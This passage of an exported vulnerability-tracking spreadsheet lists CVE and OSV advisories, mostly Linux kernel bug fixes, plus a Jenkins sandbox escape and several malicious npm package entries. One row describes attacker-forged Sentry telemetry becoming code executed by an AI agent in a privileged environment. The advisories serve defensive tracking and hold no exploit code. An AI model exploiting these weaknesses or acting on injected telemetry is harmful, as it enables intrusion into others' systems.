      <c r="D1647" s="5" t="inlineStr"/>
      <c r="E1647" s="5" t="inlineStr"/>
      <c r="F1647" s="5" t="inlineStr"/>
      <c r="G1647" s="5" t="inlineStr"/>
      <c r="H1647" s="5" t="inlineStr"/>
      <c r="I1647" s="5" t="inlineStr"/>
      <c r="J1647" s="5" t="inlineStr"/>
      <c r="K1647" s="5" t="inlineStr"/>
      <c r="L1647" s="5" t="inlineStr"/>
      <c r="M1647" s="5" t="inlineStr"/>
      <c r="N1647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1647" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1647" s="5" t="inlineStr"/>
      <c r="Q1647" s="5" t="inlineStr"/>
      <c r="R1647" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: hd3ss3220: track VBUS enable state per consumer
regulator_is_enabled() reports the aggregate regulator state, not
whether this consumer holds an enable reference. If another consumer
enables VBUS first, the driver can skip its own regulator_enable() call
and later attempt to drop a reference it never acquired, triggering an
unbalanced regulator disable warning.
Track successful enable and disable calls locally. Keep the state
unchanged when an operation fails so a later role or ID notification
retries the operation while this consumer keeps balanced references.</t>
        </is>
      </c>
      <c r="S1647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90028</t>
        </is>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90029</t>
        </is>
      </c>
      <c r="D1648" s="5" t="inlineStr"/>
      <c r="E1648" s="5" t="inlineStr"/>
      <c r="F1648" s="5" t="inlineStr"/>
      <c r="G1648" s="5" t="inlineStr"/>
      <c r="H1648" s="5" t="inlineStr"/>
      <c r="I1648" s="5" t="inlineStr"/>
      <c r="J1648" s="5" t="inlineStr"/>
      <c r="K1648" s="5" t="inlineStr"/>
      <c r="L1648" s="5" t="inlineStr"/>
      <c r="M1648" s="5" t="inlineStr"/>
      <c r="N1648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1648" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1648" s="5" t="inlineStr"/>
      <c r="Q1648" s="5" t="inlineStr"/>
      <c r="R1648" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: storage: realtek_cr: fix use-after-free on disconnect
realtek_cr_destructor() calls timer_delete() before the chip containing
the timer is freed. The timer callback may still be running and can
rearm itself, resulting in a use-after-free.
Use timer_shutdown_sync() to wait for the callback and prevent further
rearming. Do this unconditionally because ss_en may be changed after
the timer is armed.
Move timer_setup() into init_realtek_cr() so the timer is initialized
before any failure path can invoke the destructor.
Found by static analysis.</t>
        </is>
      </c>
      <c r="S1648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90029</t>
        </is>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90031</t>
        </is>
      </c>
      <c r="D1649" s="5" t="inlineStr"/>
      <c r="E1649" s="5" t="inlineStr"/>
      <c r="F1649" s="5" t="inlineStr"/>
      <c r="G1649" s="5" t="inlineStr"/>
      <c r="H1649" s="5" t="inlineStr"/>
      <c r="I1649" s="5" t="inlineStr"/>
      <c r="J1649" s="5" t="inlineStr"/>
      <c r="K1649" s="5" t="inlineStr"/>
      <c r="L1649" s="5" t="inlineStr"/>
      <c r="M1649" s="5" t="inlineStr"/>
      <c r="N1649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1649" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1649" s="5" t="inlineStr"/>
      <c r="Q1649" s="5" t="inlineStr"/>
      <c r="R1649" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb-storage: ene_ub6250: fix race between scan work and probe
ene_ub6250_probe() calls usb_stor_probe2(), which starts the usb-storage
infrastructure and schedules the delayed scan work.  The driver then
calls ene_get_card_type(), which sends an ENE command through
ene_send_scsi_cmd() and the usb-storage bulk transfer helpers.
Both the delayed scan work, through usb_stor_Bulk_max_lun(), and
ene_get_card_type() use us-&gt;current_urb.  The scan work serializes this
access with us-&gt;dev_mutex, but the ENE card-type probe does not.  If the
scan work runs while ene_get_card_type() is still using us-&gt;current_urb,
usb_submit_urb() warns that the URB is already active.
Serialize ene_get_card_type() with us-&gt;dev_mutex, matching the locking
used by the scan path.</t>
        </is>
      </c>
      <c r="S1649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90031</t>
        </is>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90033</t>
        </is>
      </c>
      <c r="D1650" s="5" t="inlineStr"/>
      <c r="E1650" s="5" t="inlineStr"/>
      <c r="F1650" s="5" t="inlineStr"/>
      <c r="G1650" s="5" t="inlineStr"/>
      <c r="H1650" s="5" t="inlineStr"/>
      <c r="I1650" s="5" t="inlineStr"/>
      <c r="J1650" s="5" t="inlineStr"/>
      <c r="K1650" s="5" t="inlineStr"/>
      <c r="L1650" s="5" t="inlineStr"/>
      <c r="M1650" s="5" t="inlineStr"/>
      <c r="N1650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1650" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1650" s="5" t="inlineStr"/>
      <c r="Q1650" s="5" t="inlineStr"/>
      <c r="R1650" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-audio: fix OOB write in snd_usbmidi_us122l_output()
The snd_usbmidi_us122l_output() picks a count of 2 on anything slower
than high speed and never relates it to ep-&gt;max_transfer.  The URB
buffer holds exactly max_transfer bytes, so a device declaring a one
byte bulk endpoint takes two bytes from snd_rawmidi_transmit(), and the
memset that pads the rest computes 1 - 2 in int and wraps to SIZE_MAX.
Only 0x800e and 0x800f are pinned to nine bytes.  The US-122MKII at
0x0644:0x8021 falls to the default and takes usb_maxpacket(), which the
USB core only clamps downward.
The akai and novation output ops in this file were given the same guard
recently.  Do the same here.</t>
        </is>
      </c>
      <c r="S1650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90033</t>
        </is>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90034</t>
        </is>
      </c>
      <c r="D1651" s="5" t="inlineStr"/>
      <c r="E1651" s="5" t="inlineStr"/>
      <c r="F1651" s="5" t="inlineStr"/>
      <c r="G1651" s="5" t="inlineStr"/>
      <c r="H1651" s="5" t="inlineStr"/>
      <c r="I1651" s="5" t="inlineStr"/>
      <c r="J1651" s="5" t="inlineStr"/>
      <c r="K1651" s="5" t="inlineStr"/>
      <c r="L1651" s="5" t="inlineStr"/>
      <c r="M1651" s="5" t="inlineStr"/>
      <c r="N1651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1651" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1651" s="5" t="inlineStr"/>
      <c r="Q1651" s="5" t="inlineStr"/>
      <c r="R1651" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: image: mdc800: change kmalloc() to kzalloc()
Change the kmalloc() calls in usb_mdc800_init() for irq_urb_buffer and
download_urb_buffer to kzalloc(), avoiding potential stack leaks if a
shorter message is received in mdc800_usb_irq() and
mdc800_usb_download_notify()</t>
        </is>
      </c>
      <c r="S1651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90034</t>
        </is>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90035</t>
        </is>
      </c>
      <c r="D1652" s="5" t="inlineStr"/>
      <c r="E1652" s="5" t="inlineStr"/>
      <c r="F1652" s="5" t="inlineStr"/>
      <c r="G1652" s="5" t="inlineStr"/>
      <c r="H1652" s="5" t="inlineStr"/>
      <c r="I1652" s="5" t="inlineStr"/>
      <c r="J1652" s="5" t="inlineStr"/>
      <c r="K1652" s="5" t="inlineStr"/>
      <c r="L1652" s="5" t="inlineStr"/>
      <c r="M1652" s="5" t="inlineStr"/>
      <c r="N1652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1652" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1652" s="5" t="inlineStr"/>
      <c r="Q1652" s="5" t="inlineStr"/>
      <c r="R1652" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: fix division by zero in get_estimated_bw()
get_estimated_bw() divides by link-&gt;dpia_bw_alloc_config.bw_granularity,
which is zeroed by reset_bw_alloc_struct() and only populated once
DP_TUNNELING_BW_ALLOC_CAP_CHANGED has been handled.
link_dp_dpia_handle_bw_alloc_status(), the DPCD interrupt handler,
calls get_estimated_bw() whenever DP_TUNNELING_ESTIMATED_BW_CHANGED
is set, independently of whether DP_TUNNELING_BW_ALLOC_CAP_CHANGED
has ever fired for that link. A connected USB4/DPIA tunneling device
that reports an estimated-bandwidth change before ever reporting a
capability change drives a division by zero in this IRQ path.
link_dpia_send_bw_alloc_request() already guards the same
bw_granularity division; add the identical guard here rather than
introducing a new pattern.
(cherry picked from commit f2a961457c33dc34223aad5c9e8971de34a4eed3)</t>
        </is>
      </c>
      <c r="S1652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90035</t>
        </is>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90039</t>
        </is>
      </c>
      <c r="D1653" s="5" t="inlineStr"/>
      <c r="E1653" s="5" t="inlineStr"/>
      <c r="F1653" s="5" t="inlineStr"/>
      <c r="G1653" s="5" t="inlineStr"/>
      <c r="H1653" s="5" t="inlineStr"/>
      <c r="I1653" s="5" t="inlineStr"/>
      <c r="J1653" s="5" t="inlineStr"/>
      <c r="K1653" s="5" t="inlineStr"/>
      <c r="L1653" s="5" t="inlineStr"/>
      <c r="M1653" s="5" t="inlineStr"/>
      <c r="N1653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1653" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1653" s="5" t="inlineStr"/>
      <c r="Q1653" s="5" t="inlineStr"/>
      <c r="R1653" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Guard admin state-revocation walks with NFSD_NET_UP
Writing to /proc/fs/nfsd/unlock_filesystem, or sending the
NFSD_CMD_UNLOCK_FILESYSTEM or NFSD_CMD_UNLOCK_EXPORT netlink command,
walks the NFSv4 client hash tables to revoke open state and cancel
async COPY operations.  All three handlers gate that walk on
nn-&gt;nfsd_serv, but a listener added via portlist or netlink
listener_set sets nn-&gt;nfsd_serv before any nfsd thread starts.
nfsd_startup_net() has not yet allocated nn-&gt;conf_id_hashtbl, so the
walkers dereference a NULL table.  A local administrator with
CAP_SYS_ADMIN can crash the kernel this way without ever starting the
server.
nn-&gt;nfsd_serv is set when the service is created, which precedes
table allocation.  NFSD_NET_UP instead brackets the window where the
tables are live: set at the end of nfsd_startup_net() and cleared in
nfsd_shutdown_net() after they are freed, both under nfsd_mutex.
Gating the three unlock paths on NFSD_NET_UP fixes the startup-time
NULL dereference while preserving the earlier post-shutdown
use-after-free fix.</t>
        </is>
      </c>
      <c r="S1653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90039</t>
        </is>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90040</t>
        </is>
      </c>
      <c r="D1654" s="5" t="inlineStr"/>
      <c r="E1654" s="5" t="inlineStr"/>
      <c r="F1654" s="5" t="inlineStr"/>
      <c r="G1654" s="5" t="inlineStr"/>
      <c r="H1654" s="5" t="inlineStr"/>
      <c r="I1654" s="5" t="inlineStr"/>
      <c r="J1654" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1654" s="5" t="inlineStr"/>
      <c r="L1654" s="5" t="inlineStr"/>
      <c r="M1654" s="5" t="inlineStr"/>
      <c r="N1654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1654" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1654" s="5" t="inlineStr"/>
      <c r="Q1654" s="5" t="inlineStr"/>
      <c r="R1654" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: SEV: Forcefully invalidate SNP VMSA if its backing gmem page is zapped
Wire up a gmem_invalidate_range() call for SNP VMs, and use it to force
vCPUs to reload/recheck their guest-provided VMSA if the backing gmem
page is being invalidated, e.g. is being PUNCH_HOLE'd.  Use the same core
logic to handle invalidations as VMX does for the APIC-access page, as the
two concepts are nearly identical: shove the physical address of a page
into the vCPU's control structure:
 1. Snapshot the invalidation sequence counter
 2. Grab the pfn (from guest_memfd in this case)
 3. Acquire mmu_lock for read
 4. Re-request reload if retry is needed, otherwise commit the change.
Note, the re-request action in #4 is necessary as KVM's retry logic is
fuzzy, i.e. can get false positives.  If the guest_memfd page has been
dropped, at some point a subsequent reload will fail to get a PFN from
guest_memfd, and KVM will fail KVM_RUN.  If the retry was due to a false
positive, KVM will retry until there are no relevant MMU notifier events
(and will retry in the "outer" loop, i.e. will drop locks and resched as
needed).
Note #2!  Take care to invalidate the VMSA when a relevant memslot is
DELETED or MOVED, as invalidations in response to PUNCH_HOLE are predicated
on memslot bindings (KVM doesn't know what GFN range(s) to invalidate
without a binding).  And more importantly, the VMSA mapping requires a
memslot, i.e. must be invalidated if its memslots disappears, regardless of
the state of the underlying guest_memfd inode.
Failure to invalidate the vCPU's control.vmsa_pa (which is checked by
pre_sev_run()) can prevent KVM from properly freeing the page as firmware
will reject the RMPUPDATE to reclaim the page with FAIL_INUSE if the vCPU
is actively running, i.e. if VMSA page is in-use.  That in turn leads to an
RMP #PF on the next use, as the page will still be assigned to the SNP VM.
  SEV-SNP: RMPUPDATE failed for PFN 78d198, pg_level: 1, ret: 3
  SEV-SNP: PFN 0x78d198, RMP entry: [0xfff0000000144001 - 0x000000000000000f]
  CPU: 3 UID: 0 PID: 31345 Comm: sev_snp_vmsa_pu Tainted: G     U     O
  Tainted: [U]=USER, [O]=OOT_MODULE
  Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.86.0-102 01/25/2026
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x54/0x70
   rmpupdate+0x12c/0x140
   rmp_make_shared+0x3b/0x60
   sev_gmem_invalidate+0xe0/0x170 [kvm_amd]
   delete_from_page_cache_batch+0x1d8/0x220
   truncate_inode_pages_range+0x120/0x3d0
   kvm_gmem_fallocate+0x19a/0x270 [kvm]
   vfs_fallocate+0x1bc/0x1f0
   __x64_sys_fallocate+0x48/0x70
   do_syscall_64+0x10a/0x480
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
  RIP: 0033:0x496c7e
   &lt;/TASK&gt;
  ------------[ cut here ]------------
  SEV: Failed to update RMP entry for PFN 0x78d198 error -14
  WARNING: arch/x86/kvm/svm/sev.c:5160 at sev_gmem_invalidate+0x126/0x170 [kvm_amd], CPU#3: sev_snp_vmsa_pu/31345
  CPU: 3 UID: 0 PID: 31345 Comm: sev_snp_vmsa_pu Tainted: G     U     O
  Tainted: [U]=USER, [O]=OOT_MODULE
  Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.86.0-102 01/25/2026
  RIP: 0010:sev_gmem_invalidate+0x12b/0x170 [kvm_amd]
  Call Trace:
   &lt;TASK&gt;
   delete_from_page_cache_batch+0x1d8/0x220
   truncate_inode_pages_range+0x120/0x3d0
   kvm_gmem_fallocate+0x19a/0x270 [kvm]
   vfs_fallocate+0x1bc/0x1f0
   __x64_sys_fallocate+0x48/0x70
   do_syscall_64+0x10a/0x480
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
  RIP: 0033:0x496c7e
   &lt;/TASK&gt;
  irq event stamp: 20689
  hardirqs last  enabled at (20699): [&lt;ffffffff8e76092c&gt;] __console_unlock+0x5c/0x60
  hardirqs last disabled at (20708): [&lt;ffffffff8e760911&gt;] __console_unlock+0x41/0x60
  softirqs last  enabled at (20722): [&lt;ffffffff8e6cd74e&gt;] __irq_exit_rcu+0x7e/0x140
  softirqs last disabled at (20717): [&lt;ffffffff8e6cd74e&gt;] __irq_exit_rcu+0x7e/0x140
  ---[ end trace 0000000000000000 ]---
  BUG: unable to handle page fault for address: ffff99
---truncated---</t>
        </is>
      </c>
      <c r="S1654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90040</t>
        </is>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90999</t>
        </is>
      </c>
      <c r="D1655" s="5" t="inlineStr"/>
      <c r="E1655" s="5" t="inlineStr"/>
      <c r="F1655" s="5" t="inlineStr"/>
      <c r="G1655" s="5" t="inlineStr"/>
      <c r="H1655" s="5" t="inlineStr"/>
      <c r="I1655" s="5" t="inlineStr"/>
      <c r="J1655" s="5" t="inlineStr"/>
      <c r="K1655" s="5" t="inlineStr"/>
      <c r="L1655" s="5" t="inlineStr"/>
      <c r="M1655" s="5" t="inlineStr"/>
      <c r="N1655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1655" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1655" s="5" t="inlineStr"/>
      <c r="Q1655" s="5" t="inlineStr"/>
      <c r="R1655" s="5" t="inlineStr">
        <is>
          <t>Sentry Seer is vulnerable to a multi-stage trust-boundary violation that allows unauthenticated attacker-controlled telemetry to become code that is executed by an agent in a privileged automation environment. An external attacker can submit fabricated Sentry events without having access to the victim’s Sentry account, source repository, or infrastructure.</t>
        </is>
      </c>
      <c r="S1655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90999</t>
        </is>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92126</t>
        </is>
      </c>
      <c r="D1656" s="5" t="inlineStr"/>
      <c r="E1656" s="5" t="inlineStr"/>
      <c r="F1656" s="5" t="inlineStr"/>
      <c r="G1656" s="5" t="inlineStr"/>
      <c r="H1656" s="5" t="inlineStr"/>
      <c r="I1656" s="5" t="inlineStr"/>
      <c r="J1656" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K1656" s="5" t="inlineStr"/>
      <c r="L1656" s="5" t="inlineStr"/>
      <c r="M1656" s="5" t="inlineStr"/>
      <c r="N1656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1656" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1656" s="5" t="inlineStr"/>
      <c r="Q1656" s="5" t="inlineStr"/>
      <c r="R1656" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not reject @Builder annotations whose builderStrategy member names an arbitrary class, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to execute code outside the sandbox if a suitable class is present on the classpath of the component that evaluates the script.</t>
        </is>
      </c>
      <c r="S1656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92126</t>
        </is>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92571</t>
        </is>
      </c>
      <c r="D1657" s="5" t="inlineStr"/>
      <c r="E1657" s="5" t="inlineStr"/>
      <c r="F1657" s="5" t="inlineStr"/>
      <c r="G1657" s="5" t="inlineStr"/>
      <c r="H1657" s="5" t="inlineStr"/>
      <c r="I1657" s="5" t="inlineStr"/>
      <c r="J1657" s="5" t="inlineStr"/>
      <c r="K1657" s="5" t="inlineStr"/>
      <c r="L1657" s="5" t="inlineStr"/>
      <c r="M1657" s="5" t="inlineStr"/>
      <c r="N1657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1657" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1657" s="5" t="inlineStr"/>
      <c r="Q1657" s="5" t="inlineStr"/>
      <c r="R1657" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: CVE ID reserved in error and not assigned to a vulnerability. The correct CVE ID is CVE-2026-92574.</t>
        </is>
      </c>
      <c r="S1657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92571</t>
        </is>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1658" s="5" t="inlineStr">
        <is>
          <t>GHSA-4rmp-vchm-9gvg</t>
        </is>
      </c>
      <c r="D1658" s="5" t="inlineStr"/>
      <c r="E1658" s="5" t="inlineStr"/>
      <c r="F1658" s="5" t="inlineStr"/>
      <c r="G1658" s="5" t="inlineStr"/>
      <c r="H1658" s="5" t="inlineStr"/>
      <c r="I1658" s="5" t="inlineStr"/>
      <c r="J1658" s="5" t="inlineStr"/>
      <c r="K1658" s="5" t="inlineStr"/>
      <c r="L1658" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-token-pkg</t>
        </is>
      </c>
      <c r="M1658" s="5" t="inlineStr"/>
      <c r="N1658" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1658" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1658" s="5" t="inlineStr"/>
      <c r="Q1658" s="5" t="inlineStr"/>
      <c r="R1658" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (3cf7fd25b60cd680892113ab7de697ebe897542c013c8c4a977bb4852a593619)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S1658" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16246</t>
        </is>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1659" s="5" t="inlineStr">
        <is>
          <t>GHSA-4vpr-3r9p-p9fh</t>
        </is>
      </c>
      <c r="D1659" s="5" t="inlineStr"/>
      <c r="E1659" s="5" t="inlineStr"/>
      <c r="F1659" s="5" t="inlineStr"/>
      <c r="G1659" s="5" t="inlineStr"/>
      <c r="H1659" s="5" t="inlineStr"/>
      <c r="I1659" s="5" t="inlineStr"/>
      <c r="J1659" s="5" t="inlineStr"/>
      <c r="K1659" s="5" t="inlineStr"/>
      <c r="L1659" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-single-ver-pkg</t>
        </is>
      </c>
      <c r="M1659" s="5" t="inlineStr"/>
      <c r="N1659" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1659" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1659" s="5" t="inlineStr"/>
      <c r="Q1659" s="5" t="inlineStr"/>
      <c r="R1659" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (dc583cefb03bc649c96d2e8b48cc2bd5d73d8f6c489ded9b46c217ba1f212ddb)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S1659" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16245</t>
        </is>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1660" s="5" t="inlineStr">
        <is>
          <t>GHSA-4vxh-7998-9h4g</t>
        </is>
      </c>
      <c r="D1660" s="5" t="inlineStr"/>
      <c r="E1660" s="5" t="inlineStr"/>
      <c r="F1660" s="5" t="inlineStr"/>
      <c r="G1660" s="5" t="inlineStr"/>
      <c r="H1660" s="5" t="inlineStr"/>
      <c r="I1660" s="5" t="inlineStr"/>
      <c r="J1660" s="5" t="inlineStr"/>
      <c r="K1660" s="5" t="inlineStr"/>
      <c r="L1660" s="5" t="inlineStr">
        <is>
          <t>npm:kartyk-github-oidc-test-pkg</t>
        </is>
      </c>
      <c r="M1660" s="5" t="inlineStr"/>
      <c r="N1660" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1660" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1660" s="5" t="inlineStr"/>
      <c r="Q1660" s="5" t="inlineStr"/>
      <c r="R1660" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1c0bc4570b5c41bc6a589bf16daea1a90f52e57b878fe6219afb1102ec24c535)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S1660" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16244</t>
        </is>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1661" s="5" t="inlineStr">
        <is>
          <t>GHSA-63f3-rmrf-6m9q</t>
        </is>
      </c>
      <c r="D1661" s="5" t="inlineStr"/>
      <c r="E1661" s="5" t="inlineStr"/>
      <c r="F1661" s="5" t="inlineStr"/>
      <c r="G1661" s="5" t="inlineStr"/>
      <c r="H1661" s="5" t="inlineStr"/>
      <c r="I1661" s="5" t="inlineStr"/>
      <c r="J1661" s="5" t="inlineStr"/>
      <c r="K1661" s="5" t="inlineStr"/>
      <c r="L1661" s="5" t="inlineStr">
        <is>
          <t>npm:pkg-rollback-dreed-viced-sonic-ponds</t>
        </is>
      </c>
      <c r="M1661" s="5" t="inlineStr"/>
      <c r="N1661" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1661" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1661" s="5" t="inlineStr"/>
      <c r="Q1661" s="5" t="inlineStr"/>
      <c r="R1661" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (d5c66c5e78670d2099776492aa1a836a031eea3a9d43b2ffe5911a19b62c71d4)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S1661" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16247</t>
        </is>
      </c>
